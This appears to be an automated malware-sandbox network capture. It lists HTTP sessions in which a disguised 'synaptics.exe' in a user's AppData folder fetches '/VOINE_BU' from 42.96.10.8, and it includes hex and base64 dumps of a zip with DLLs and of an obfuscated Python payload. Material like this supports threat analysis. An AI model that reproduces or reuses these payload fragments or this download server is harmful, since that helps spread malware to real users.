                                                                                                                                                                                                            Data Raw: 50 4b 03 04 0a 00 00 00 00 00 84 56 57 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 44 4c 4c 73 2f 50 4b 03 04 14 00 00 00 08 00 f8 05 85 56 c9 4a 5c 2a 0c f7 0d 00 18 bb 22 00 16 00 00 00 44 4c 4c 73 2f 6c 69 62 63 72 79 70 74 6f 2d 31 5f 31 2e 64 6c 6c ec bd 07 58 54 49 b4 ef db 28 2a 0a d2 ad a2 a2 a2 a2 62 ce b6 39 62 40 50 51 18 f3 98 73 ce 62 4e 83 88 82 2d e6 30 86 d1 31 67 1d c7 ec 98 30 67 31 e7 9c c0 9c b3 72 ff bf 6e 30 cc 38 e7 dc 77 ce 79 ef 7b ef be de df 67 53 7b 57 d5 aa 55 ab aa 56 ad 54 65 cd 46 e3 0d 09 0d 06 83 a3 fe c5 c6 1a 0c 9b 0c b6 c7 db f0 9f 3f 6f f5 cf 35 f3 16 57 c3 ba a4 47 b3 6c 72 f0 3f 9a a5 6e 87 8e bd 3d 7b f4 ea de be 57 cb ae 9e ad 5b 76 eb d6 3d c8 b3 55 5b cf 5e 7d ba 79 76 ec e6 59 25 a0 8e 67 d7 ee 6d da 16 48 9e 3c 99 57 1c 8c 8d 63 33 94 7c f1 a4 4f e7 f8 7f ef a7 dd ed 7c 4f 7f b7 4e 0a ea f4 cc fa b7 47 a7 b7 d6 bf 3d 3b bd b3 fe ed 6b fd fb e2 49 50 e7 ee fa bb 69 5a 90 35 bf 88 f2 7b 3f e2 6f 9f 4e cf ad ef a3 3b db fe f6 b3 be d7 ee d8 ba 03 f0 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: PKVWYDLLs/PKVJ\*"DLLs/libcrypto-1_1.dllXTI(*b9b@PQsbN-01g0g1rn08wy{gS{WUVTeF?o5WGlr?n={W[v=U[^}yvY%gmH<Wc3|O|ONG=;kIPiZ5{?oN;q1BSi!Ag\doNc kt!5_)%gU`E4b_1Y)Pv;oe~'9mWxji0|b]VPgb0Y^ngkm8o.PPv+yJkC.JF\.U;*)~|+!?ebCLJbbZ_JdYU\6MiNcbIh1$VFj'1G2neRG)d~OeiRlY@u9U#}5Q~Oj=T^i^gW[1Q?+#I-VjA)Pz}9SV7AB<rB2CC_1!&eQu\GC&}Ka1PLHkx !f<aAvOZ;Qm}dJUcy`
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446655989 CET1236INData Raw: 50 db 61 d1 cf fb 04 c2 3e f5 12 e1 ec dd 53 6d 0c ba 2a 78 fb 52 0a 97 09 7d d5 ee d6 2c ca f5 3d 2d 78 bb 36 08 7c b9 0e 02 70 60 83 aa a5 ba ac 1a 77 27 09 a1 52 67 95 1a 51 5c 98 ee 98 ad 72 9d 18 a3 ec 59 f4 d3 63 82 32 06 ad 56 aa f8 1d 55
                                                                                                                                                                                                            Data Ascii: Pa>Sm*xR},=-x6|p`w'RgQ\rYc2VUxEb=W_*(Z];=CLn,b[jrMoa0.!LWQ+^b~VADYBO0ETl7U$jA9^IO\VFG._W
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446692944 CET1236INData Raw: 7e d6 f4 d0 cf c3 2e 2a dc c0 24 c8 b5 7b a8 6e fe 69 ea 82 7b b8 e6 41 ef 1e 02 5f eb 32 fc 6f ae be 2d 80 4f 06 2c 11 7e a3 3f 0a ab 7a 15 44 c4 9d e5 54 f7 30 cb 6f aa 44 df 98 96 06 f5 d7 e5 8e 80 ee 4f aa 6a 37 9f a9 dd 9a 54 2b d9 46 e0 4f
                                                                                                                                                                                                            Data Ascii: ~.*${ni{A_2o-O,~?zDT0oDOj7T+FOT%Q]T#{}TU;QY5V9*wsrkr"w,k+7Bg`-O?w+Y5e<l'P#'!n]-n]|)*SD?KR|-
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446727037 CET1236INData Raw: f8 ea 1f 55 e3 cc 4a a5 ae 97 40 7f bb ae 22 fb 10 3a 7e ea 24 32 75 49 af d7 9c 5d 91 37 98 16 9f 16 08 d4 f9 b6 02 b5 7b 92 7e ca a3 4c 95 8a 11 56 8e d7 95 61 44 ae 1b 78 40 58 65 67 ea 15 02 ab 1a ed 95 2a be 55 6d b4 bc 2a d2 35 e1 db 9b f6
                                                                                                                                                                                                            Data Ascii: UJ@":~$2uI]7{~LVaDx@Xeg*Um*54PBJ9f'O"P5c9<f4B:WW[uMYPQUk[sqAlD~@T>j>Ymx?E\X>(TZ$6?7\@/&Un}Z*7A,@
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446764946 CET848INData Raw: b3 70 ce be 58 d5 fe 80 fb 2c 47 7c 7b bd 40 d4 ad f8 58 c3 dd e4 8a a8 b1 f1 bc 32 7a bd 57 b5 2b a5 34 8c 4e 14 5e fb 49 b9 db b1 65 a4 c3 52 34 19 f9 7e c7 30 15 69 34 44 85 b3 bf 54 35 6f 34 8c 0f 9d f5 5a 3f 05 e3 81 80 b6 b5 af ca 9d cb a8
                                                                                                                                                                                                            Data Ascii: pX,G|{@X2zW+4N^IeR4~0i4DT5o4Z?vk7QT%D:VP6jtzVc(.PORjF?m-V_l#L?b/Z+aw>"<x>eDTA^<7OahN|e`a
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446799040 CET1236INData Raw: c0 5f c1 2e 1f 36 54 ad ad 5d aa d7 c7 c5 34 f5 62 ba a9 bf a7 61 0f 46 03 f2 df 2c 6d 77 89 10 ac 7b 60 d3 ef cc 78 14 6f aa 6f 3f 35 d1 4f 13 36 aa 24 49 d4 50 6d e6 fd ca 3f 44 0d 77 3c 0d e6 3e 42 e8 6a 5a e5 26 9d 2d 84 8a a2 73 ce 19 26 78
                                                                                                                                                                                                            Data Ascii: _.6T]4baF,mw{`xoo?5O6$IPm?Dw<>BjZ&-s&x5^!y(,I'JBnhPLO<p-#TCczHSFBP^#Of&k_[ FKCV_o5yCEMSz-J
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446832895 CET1236INData Raw: eb ad 63 0b 55 f3 61 be fc 82 91 28 c3 af aa bb 68 a8 52 59 98 1b fe 89 04 c0 f7 39 f2 0b e2 6a 04 7e ab e8 25 aa d6 bb ab fa db 2d 5a 18 6c 1e ca f8 22 e4 1b fb 8a 24 cb dc f5 fa ca 45 f8 45 35 56 8d 32 88 79 8b 58 c9 6b 7e 52 46 93 b2 1a a3 f6
                                                                                                                                                                                                            Data Ascii: cUa(hRY9j~%-Zl"$EE5V2yXk~RF,?^U@i]qQ99EXT[_o1$<}aEw?;vt@?_J{*#}b/L!=GLHJ}+M#x}fBo.f=&1!qo*
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446866989 CET1236INData Raw: 90 a6 45 f7 76 f8 43 fd b1 af 0d 17 94 f1 a5 54 e4 12 5d b8 5b 42 08 9d 00 f2 47 82 ba 7c 61 fa 27 87 a9 f0 6f f7 f0 1f 55 52 17 ea dc c6 3e de 41 a4 0b 7f ad 0c b7 db f8 6b b1 3d a4 bf c2 7e d9 45 e5 a2 98 43 0f ee 2b 23 c7 03 41 0e ee 80 7c 1f
                                                                                                                                                                                                            Data Ascii: EvCT][BG|a'oUR>Ak=~EC+#A|)7G3(KcQ*<}U/d>~?.{4LE6'"),RMBt/_xrXS5rWx2W"w-+XS3g<&F;
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446902037 CET1236INData Raw: 0a 98 87 ec fd 08 aa 2d 21 be a9 0e 66 eb 02 4d a0 5f 39 f5 e3 f4 5d 95 5b 8d b8 35 f0 17 f5 cd e7 a9 ca f5 00 97 bc b8 b6 aa ba ea db 4f 51 c2 79 d6 31 bd f6 4b 23 c4 6f e6 21 be 69 21 f2 e4 21 81 3f f5 46 35 86 b6 84 3f 77 53 ca 8d 20 cf d5 58
                                                                                                                                                                                                            Data Ascii: -!fM_9][5OQy1K#o!i!!?F5?wS XG;b:/B`n}.>.pqiE\**5^jmXieD}0}NEFbNG]^6RkXpRsq@m!0@>\Hh)B$vs
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446940899 CET848INData Raw: 72 4c a9 37 8c 51 ed a2 7a 1d c2 78 34 fc 2c c8 bb 7f d2 b7 ab 49 d4 f8 cf 9c 5a b8 7d 5c 19 3b f2 b3 ff 42 f6 3e 6c 3b 4f c1 ea 30 21 0a 55 91 7c e7 22 eb e5 e3 94 c6 39 5c ab 27 6b 08 8d a3 f5 89 ef c4 62 93 6d aa ca 65 c2 0a db b1 20 fe 3c 6a
                                                                                                                                                                                                            Data Ascii: rL7Qzx4,IZ}\;B>l;O0!U|"9\'kbme <jGRLDQf'+SaNr[j|Q$@VX`Xfi!7g/O}Ab'$zUY[@s"NCnG>lluC8z}\^
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.451919079 CET1236INData Raw: 65 7a ab 0b 77 3b ab 5c c5 dc ac 0f 4e e4 26 39 2a 4c 87 b7 c5 be 71 42 85 3b 70 c0 ca 3c 50 f0 8e f9 aa 46 6e 62 25 ab 10 d2 62 e4 b0 61 db 9f f1 7f 44 0b bf a7 c4 45 96 e1 18 54 5f 7a 74 62 01 fc f9 3d f1 de 45 91 77 11 d5 32 36 10 d0 30 42 7c
                                                                                                                                                                                                            Data Ascii: ezw;\N&9*LqB;p<PFnb%baDET_ztb=Ew260B|_@jt%!g/q;"I^DV9^zI`edVKYbo*2_^\?nNx|:gOAP{B1sOasSFS4lbGH6oSn


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.44990842.96.10.8805232C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 13, 2024 13:26:31.958678007 CET122OUTGET /VOINE_BU HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            Host: 42.96.10.8
                                                                                                                                                                                                            User-Agent: Python-urllib/3.10
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961005926 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:26:32 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Fri, 01 Nov 2024 15:53:10 GMT
                                                                                                                                                                                                            ETag: "18ce8-625dbee861deb"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 101608
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 5a 47 56 6d 49 48 4e 31 59 6c 39 43 4d 45 52 58 4f 56 4a 54 52 6b 39 47 51 31 4a 56 4e 6c 4e 47 53 54 4d 78 4e 55 31 43 55 43 67 70 4f 67 6f 4a 64 6d 46 79 58 30 64 48 54 6b 34 32 52 6c 59 67 50 53 41 35 4e 54 6b 77 4f 44 55 77 4e 54 45 79 43 67 6c 32 59 58 4a 66 51 30 4e 50 51 31 56 48 55 6b 6c 4b 54 30 4e 59 53 69 41 39 49 43 4a 48 56 30 31 43 4e 54 46 47 52 31 46 61 53 44 52 4b 56 45 4a 58 53 53 49 4b 43 58 5a 68 63 6c 38 31 57 6c 59 32 54 46 63 78 52 79 41 39 49 43 4a 4d 53 6c 45 77 53 54 68 56 4d 53 49 4b 43 58 5a 68 63 6c 38 7a 51 6a 49 78 52 56 5a 52 4d 43 41 39 49 44 49 33 4d 54 55 7a 4e 6a 6b 33 4e 6a 59 4b 43 58 5a 68 63 6c 38 33 4d 6b 63 35 4d 79 41 39 49 43 49 32 4e 31 49 77 54 46 59 32 57 45 30 30 56 44 6c 43 4e 31 49 32 4e 31 4d 69 43 67 6c 32 59 58 4a 66 53 44 5a 56 4e 45 4d 30 4f 45 59 35 55 45 6c 4e 54 69 41 39 49 43 4a 42 56 55 70 4a 54 6a 56 53 52 30 63 31 54 44 42 43 51 30 46 54 56 55 77 69 43 67 6c 32 59 58 4a 66 4e 30 4a 4f 4d 31 6c 4b 57 6c 6b 67 50 53 41 30 4e 7a 55 7a 4d 7a [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: ZGVmIHN1Yl9CMERXOVJTRk9GQ1JVNlNGSTMxNU1CUCgpOgoJdmFyX0dHTk42RlYgPSA5NTkwODUwNTEyCgl2YXJfQ0NPQ1VHUklKT0NYSiA9ICJHV01CNTFGR1FaSDRKVEJXSSIKCXZhcl81WlY2TFcxRyA9ICJMSlEwSThVMSIKCXZhcl8zQjIxRVZRMCA9IDI3MTUzNjk3NjYKCXZhcl83Mkc5MyA9ICI2N1IwTFY2WE00VDlCN1I2N1MiCgl2YXJfSDZVNEM0OEY5UElNTiA9ICJBVUpJTjVSR0c1TDBCQ0FTVUwiCgl2YXJfN0JOM1lKWlkgPSA0NzUzMzQ3MjM2Cgl2YXJfRkZDTElPT01XID0gNjU4NDIyMjY1NQoJdmFyXzBTNFFTQTUwNjU4VksgPSA2NTUyMDUzMDE4Cgl2YXJfMUJCTjdMWVUxQyA9ICJPWTdFSU9EU1gwT0lTTEkiCgl2YXJfWjRPRkxaVUggPSA4NTk1NDQzNzg5Cgl2YXJfREJUQU9MV0s1UUEgPSA1ODY3NDQ5NjUzCgl2YXJfSTdSV1NMNkRQOVFOQiA9ICJUSFlKUlVHQSIKCXZhcl9ZSFlQTVYyTzdUVks1SjAgPSAiQTVURzg4T0YxOVZCMCIKCXZhcl9YR1ExNUMgPSAiNkJOS0QzTEUiCgl2YXJfODBDQjYzQlNWRVEzU1ogPSA1NzYzMzM5NTY3Cgl2YXJfRkhQTjAgPSAiS0xVRU9UN1lHSFAxNkNPIgoJdmFyX1Y0TExPNDJGID0gIk9KWFJOQVZaR1ZFMiIKCXZhcl9VVzJSM0RHVTcgPSAiNVpaNjdIVzYyUkIiCgl2YXJfUldCSTJEMFU5RjhCNSA9ICI0MThaSkxUTEZYRUhPIgoJdmFyX0lRS0NMWkxQRDUgPSAiQ1JUREY3NUxJSTkiCgl2YXJfM09DVjdSSEExR0wwQlEgPSAzNTQ1OTY5NDk5Cgl2
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961025000 CET1236INData Raw: 59 58 4a 66 52 54 4a 52 52 7a 52 48 49 44 30 67 4d 6a 49 79 4e 54 59 30 4e 44 55 31 4e 77 70 6b 5a 57 59 67 63 33 56 69 58 7a 42 47 54 6c 68 43 53 56 6c 58 52 6a 52 4f 54 45 38 34 4d 56 55 32 57 6c 5a 42 51 6b 39 52 4b 43 6b 36 43 67 6c 32 59 58
                                                                                                                                                                                                            Data Ascii: YXJfRTJRRzRHID0gMjIyNTY0NDU1NwpkZWYgc3ViXzBGTlhCSVlXRjROTE84MVU2WlZBQk9RKCk6Cgl2YXJfOVZEN1ZJUiA9ICJXTEwwTEg0RFQ2OTk1RFVKWEYiCgl2YXJfQkJMRE5UWENWRFYgPSAiVEQ4NTlTSllDSEowSDdYWCIKCXZhcl9EMjRBS1ZXNDRSUVo3N0QgPSAiS0lVWUhTN0pLTyIKCXZhcl9LSE5YQ1QgPSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961035013 CET1236INData Raw: 53 54 6c 4c 4d 46 46 5a 57 45 74 49 54 79 41 39 49 43 4a 55 54 6c 49 31 57 56 6b 30 52 54 46 42 4e 56 51 31 55 6c 45 32 49 67 6f 4a 64 6d 46 79 58 7a 56 47 54 55 6c 48 54 44 4a 45 55 55 56 59 49 44 30 67 4d 54 41 78 4e 44 6b 7a 4f 44 4d 77 4d 67
                                                                                                                                                                                                            Data Ascii: STlLMFFZWEtITyA9ICJUTlI1WVk0RTFBNVQ1UlE2IgoJdmFyXzVGTUlHTDJEUUVYID0gMTAxNDkzODMwMgoJdmFyX0lTR1U4S0M3SkE0NiA9ICI3RldNRE9SWjBMIgoJdmFyX083WDRUUVMyID0gIjlVSDkyQ1MwWVVDODYiCgl2YXJfNklTMkQxQzlCQ0ZNTCA9ICI4M0RQS0lXUlAwUFpWUCIKCXZhcl80RUNCUktFR1I0M0h
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961127996 CET1236INData Raw: 54 30 30 7a 55 53 49 4b 43 58 5a 68 63 6c 39 46 4e 54 42 52 53 54 42 49 4e 44 6c 47 52 6b 4a 54 49 44 30 67 4d 7a 63 33 4f 54 41 31 4d 7a 49 34 4f 51 6f 4a 64 6d 46 79 58 31 6c 59 4e 45 4a 4e 4f 56 56 42 4e 79 41 39 49 43 4a 48 56 30 39 53 53 6b
                                                                                                                                                                                                            Data Ascii: T00zUSIKCXZhcl9FNTBRSTBINDlGRkJTID0gMzc3OTA1MzI4OQoJdmFyX1lYNEJNOVVBNyA9ICJHV09SSkhLSTZGIgoJdmFyX1VQM0VYRiA9IDMwNjkxOTA2MDYKCXZhcl9WU01YSUM1R1E5OUMzTiA9IDk2NjgyNjc0ODEKCXZhcl9BMFQxODZVNzZITyA9ICJZUlkxQUFSNjVUNVpTMzRHIgoJdmFyX1EyOE5IMTIxWElPRSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961136103 CET1236INData Raw: 51 6b 35 49 51 30 77 79 4e 54 41 33 52 69 49 4b 43 58 5a 68 63 6c 38 30 4e 55 56 51 54 44 56 5a 4d 55 70 48 52 46 5a 4c 57 43 41 39 49 43 4a 4e 54 46 42 59 53 6b 34 7a 4d 45 30 77 4f 46 6c 4c 55 53 49 4b 43 58 5a 68 63 6c 39 4f 53 56 63 32 57 6b
                                                                                                                                                                                                            Data Ascii: Qk5IQ0wyNTA3RiIKCXZhcl80NUVQTDVZMUpHRFZLWCA9ICJNTFBYSk4zME0wOFlLUSIKCXZhcl9OSVc2Wk05OUxGID0gNDc0ODA3NzYxMAoJdmFyX1hBMTBROUg5ID0gIk5QVVRQMVhJSDBHVVZSIgoJdmFyX1cxSElESjlJT080WkxGVSA9ICIzRlFYMDBFRjFCWk41OSIKCXZhcl9HWkhIQTUgPSA5NzMwNjUwMTI5Cgl2YXJ
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961148977 CET1096INData Raw: 53 43 49 4b 43 58 5a 68 63 6c 38 31 57 6a 56 4c 4f 55 51 78 52 6b 5a 42 4d 30 35 51 49 44 30 67 49 6b 39 59 4f 45 46 57 4e 6b 5a 4b 54 69 49 4b 43 58 5a 68 63 6c 39 54 57 44 49 35 57 45 31 56 55 45 35 55 52 30 74 54 55 54 6b 67 50 53 41 79 4e 44
                                                                                                                                                                                                            Data Ascii: SCIKCXZhcl81WjVLOUQxRkZBM05QID0gIk9YOEFWNkZKTiIKCXZhcl9TWDI5WE1VUE5UR0tTUTkgPSAyNDk5MDgxOTA5Cgl2YXJfV0xVQlkgPSAiSFpRNUxTMlVTSSIKCXZhcl9NMkcySVIxOSA9IDczMTI1MTY5OTYKZGVmIHN1Yl9UQTVPMTVEOUFRRlU4SUNPVDBZNkY5UigpOgoJdmFyX0JaQTE2NCA9IDc1NTgzMDQ3MDY
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961165905 CET1236INData Raw: 4d 45 46 50 4e 46 6b 33 52 46 59 67 50 53 41 33 4f 44 6b 77 4e 54 49 33 4e 7a 59 79 43 6d 52 6c 5a 69 42 7a 64 57 4a 66 54 46 4e 51 57 6a 41 35 53 55 68 48 56 54 56 45 4e 46 4e 4c 56 45 38 32 55 6b 70 52 55 6a 51 6f 4b 54 6f 4b 43 58 5a 68 63 6c
                                                                                                                                                                                                            Data Ascii: MEFPNFk3RFYgPSA3ODkwNTI3NzYyCmRlZiBzdWJfTFNQWjA5SUhHVTVENFNLVE82UkpRUjQoKToKCXZhcl9MQ1gyT0FTRCA9IDcwMzk5Njg5ODAKCXZhcl9WMUQ3WFgyID0gIk5aQkNPS1M3V0xGVUxXIgoJdmFyXzRZMDdTSDlXUzNHID0gOTI3MjczOTU3NgoJdmFyX0dMVkg2WCA9ICJPRUpGUkk5RlFOSk8iCgl2YXJfN0V
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961177111 CET1236INData Raw: 4d 7a 4e 54 56 6b 39 46 52 46 52 4f 51 55 4a 42 4f 43 41 39 49 44 59 7a 4d 7a 45 31 4d 54 59 31 4d 44 49 4b 43 58 5a 68 63 6c 38 79 56 44 6c 51 55 6b 52 52 49 44 30 67 4f 44 55 78 4d 6a 49 7a 4f 54 4d 30 4e 77 6f 4a 64 6d 46 79 58 7a 6c 49 56 45
                                                                                                                                                                                                            Data Ascii: MzNTVk9FRFROQUJBOCA9IDYzMzE1MTY1MDIKCXZhcl8yVDlQUkRRID0gODUxMjIzOTM0NwoJdmFyXzlIVE9VWkQxWFgyID0gNjc0OTkwNTQwMAoJdmFyXzdLSlZFT1ZEID0gIjVZSVBHQldOUFBJQ0lJIgoJdmFyX1RWNE5DWiA9IDczMjE4NTYzMjQKCXZhcl9WRzRZQTlVSTNFWFkgPSA1Mzk4OTAwNzMwCgl2YXJfUjA1QjJ
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961193085 CET424INData Raw: 49 43 4a 5a 4d 45 49 33 53 30 6c 55 57 54 41 32 53 31 63 69 43 67 6c 32 59 58 4a 66 54 30 78 4a 52 56 46 4f 49 44 30 67 49 6b 38 30 4d 7a 59 33 4d 30 31 47 53 30 4e 44 54 30 5a 48 51 31 42 4a 51 79 49 4b 43 58 5a 68 63 6c 38 30 4f 55 35 61 51 6b
                                                                                                                                                                                                            Data Ascii: ICJZMEI3S0lUWTA2S1ciCgl2YXJfT0xJRVFOID0gIk80MzY3M01GS0NDT0ZHQ1BJQyIKCXZhcl80OU5aQk1BTyA9IDM0MzY3NjIyMDMKCXZhcl9WMjVLQ0RTOUFKWEsyTk4gPSAiVEk0SkhFVTBIQ08iCgl2YXJfU0ZVQVdJUlgwSFAzQ1ggPSAiOERXVlFDSlZMIgoJdmFyX0NZWDRIR1cxSTMgPSAiNlE4SDNHMzBLN09QT1R
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.961302996 CET1236INData Raw: 59 58 4a 66 56 30 4d 35 4e 30 67 67 50 53 41 31 4e 7a 41 78 4e 44 67 79 4d 6a 49 35 43 67 6c 32 59 58 4a 66 4d 54 4e 54 4d 7a 46 45 56 45 6c 4b 52 30 51 67 50 53 41 69 52 44 51 30 4e 31 46 53 4e 55 77 69 43 67 6c 32 59 58 4a 66 4e 55 68 51 4d 54
                                                                                                                                                                                                            Data Ascii: YXJfV0M5N0ggPSA1NzAxNDgyMjI5Cgl2YXJfMTNTMzFEVElKR0QgPSAiRDQ0N1FSNUwiCgl2YXJfNUhQMTNPVSA9IDQwOTY4MzU0MzAKCXZhcl8zVEtPUjNNNjhDNEI4SUQgPSAyNzMyMDYwMzA5CmRlZiBzdWJfVVYzOUtMTjhXSVRLRDk3T0ROUTdIODMoKToKCXZhcl9MRjhITjBNQUlJMVcgPSAiSjdEV1QxVEdKTyIKCXZ
                                                                                                                                                                                                            Nov 13, 2024 13:26:32.966204882 CET1236INData Raw: 4b 54 6f 4b 43 58 5a 68 63 6c 39 4c 55 7a 4e 42 52 7a 63 31 49 44 30 67 4f 54 45 35 4d 7a 6b 30 4d 54 55 32 4e 77 6f 4a 64 6d 46 79 58 31 56 47 52 6b 70 44 4f 45 31 4f 51 30 46 44 52 31 4e 57 52 69 41 39 49 44 63 32 4d 7a 45 30 4e 6a 49 78 4e 54
                                                                                                                                                                                                            Data Ascii: KToKCXZhcl9LUzNBRzc1ID0gOTE5Mzk0MTU2NwoJdmFyX1VGRkpDOE1OQ0FDR1NWRiA9IDc2MzE0NjIxNTUKCXZhcl9HV1NOS1EzWEI5OTZIID0gNjI5ODA4NzE1NAoJdmFyXzBON1E5ID0gIldYTkE1MVlTWFIiCgl2YXJfWFdJMkZSSDk5ODE3SDNNID0gIjA0QUcyVUwwTSIKCXZhcl9GU0E4WElMNTBRT0wgPSAzMDAwODI


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.44991542.96.10.8808168C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 13, 2024 13:26:33.207758904 CET122OUTGET /VOINE_BU HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            Host: 42.96.10.8
                                                                                                                                                                                                            User-Agent: Python-urllib/3.10
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.276957035 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:26:34 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Fri, 01 Nov 2024 15:53:10 GMT
                                                                                                                                                                                                            ETag: "18ce8-625dbee861deb"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 101608
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 5a 47 56 6d 49 48 4e 31 59 6c 39 43 4d 45 52 58 4f 56 4a 54 52 6b 39 47 51 31 4a 56 4e 6c 4e 47 53 54 4d 78 4e 55 31 43 55 43 67 70 4f 67 6f 4a 64 6d 46 79 58 30 64 48 54 6b 34 32 52 6c 59 67 50 53 41 35 4e 54 6b 77 4f 44 55 77 4e 54 45 79 43 67 6c 32 59 58 4a 66 51 30 4e 50 51 31 56 48 55 6b 6c 4b 54 30 4e 59 53 69 41 39 49 43 4a 48 56 30 31 43 4e 54 46 47 52 31 46 61 53 44 52 4b 56 45 4a 58 53 53 49 4b 43 58 5a 68 63 6c 38 31 57 6c 59 32 54 46 63 78 52 79 41 39 49 43 4a 4d 53 6c 45 77 53 54 68 56 4d 53 49 4b 43 58 5a 68 63 6c 38 7a 51 6a 49 78 52 56 5a 52 4d 43 41 39 49 44 49 33 4d 54 55 7a 4e 6a 6b 33 4e 6a 59 4b 43 58 5a 68 63 6c 38 33 4d 6b 63 35 4d 79 41 39 49 43 49 32 4e 31 49 77 54 46 59 32 57 45 30 30 56 44 6c 43 4e 31 49 32 4e 31 4d 69 43 67 6c 32 59 58 4a 66 53 44 5a 56 4e 45 4d 30 4f 45 59 35 55 45 6c 4e 54 69 41 39 49 43 4a 42 56 55 70 4a 54 6a 56 53 52 30 63 31 54 44 42 43 51 30 46 54 56 55 77 69 43 67 6c 32 59 58 4a 66 4e 30 4a 4f 4d 31 6c 4b 57 6c 6b 67 50 53 41 30 4e 7a 55 7a 4d 7a [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: ZGVmIHN1Yl9CMERXOVJTRk9GQ1JVNlNGSTMxNU1CUCgpOgoJdmFyX0dHTk42RlYgPSA5NTkwODUwNTEyCgl2YXJfQ0NPQ1VHUklKT0NYSiA9ICJHV01CNTFGR1FaSDRKVEJXSSIKCXZhcl81WlY2TFcxRyA9ICJMSlEwSThVMSIKCXZhcl8zQjIxRVZRMCA9IDI3MTUzNjk3NjYKCXZhcl83Mkc5MyA9ICI2N1IwTFY2WE00VDlCN1I2N1MiCgl2YXJfSDZVNEM0OEY5UElNTiA9ICJBVUpJTjVSR0c1TDBCQ0FTVUwiCgl2YXJfN0JOM1lKWlkgPSA0NzUzMzQ3MjM2Cgl2YXJfRkZDTElPT01XID0gNjU4NDIyMjY1NQoJdmFyXzBTNFFTQTUwNjU4VksgPSA2NTUyMDUzMDE4Cgl2YXJfMUJCTjdMWVUxQyA9ICJPWTdFSU9EU1gwT0lTTEkiCgl2YXJfWjRPRkxaVUggPSA4NTk1NDQzNzg5Cgl2YXJfREJUQU9MV0s1UUEgPSA1ODY3NDQ5NjUzCgl2YXJfSTdSV1NMNkRQOVFOQiA9ICJUSFlKUlVHQSIKCXZhcl9ZSFlQTVYyTzdUVks1SjAgPSAiQTVURzg4T0YxOVZCMCIKCXZhcl9YR1ExNUMgPSAiNkJOS0QzTEUiCgl2YXJfODBDQjYzQlNWRVEzU1ogPSA1NzYzMzM5NTY3Cgl2YXJfRkhQTjAgPSAiS0xVRU9UN1lHSFAxNkNPIgoJdmFyX1Y0TExPNDJGID0gIk9KWFJOQVZaR1ZFMiIKCXZhcl9VVzJSM0RHVTcgPSAiNVpaNjdIVzYyUkIiCgl2YXJfUldCSTJEMFU5RjhCNSA9ICI0MThaSkxUTEZYRUhPIgoJdmFyX0lRS0NMWkxQRDUgPSAiQ1JUREY3NUxJSTkiCgl2YXJfM09DVjdSSEExR0wwQlEgPSAzNTQ1OTY5NDk5Cgl2
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277081013 CET1236INData Raw: 59 58 4a 66 52 54 4a 52 52 7a 52 48 49 44 30 67 4d 6a 49 79 4e 54 59 30 4e 44 55 31 4e 77 70 6b 5a 57 59 67 63 33 56 69 58 7a 42 47 54 6c 68 43 53 56 6c 58 52 6a 52 4f 54 45 38 34 4d 56 55 32 57 6c 5a 42 51 6b 39 52 4b 43 6b 36 43 67 6c 32 59 58
                                                                                                                                                                                                            Data Ascii: YXJfRTJRRzRHID0gMjIyNTY0NDU1NwpkZWYgc3ViXzBGTlhCSVlXRjROTE84MVU2WlZBQk9RKCk6Cgl2YXJfOVZEN1ZJUiA9ICJXTEwwTEg0RFQ2OTk1RFVKWEYiCgl2YXJfQkJMRE5UWENWRFYgPSAiVEQ4NTlTSllDSEowSDdYWCIKCXZhcl9EMjRBS1ZXNDRSUVo3N0QgPSAiS0lVWUhTN0pLTyIKCXZhcl9LSE5YQ1QgPSA
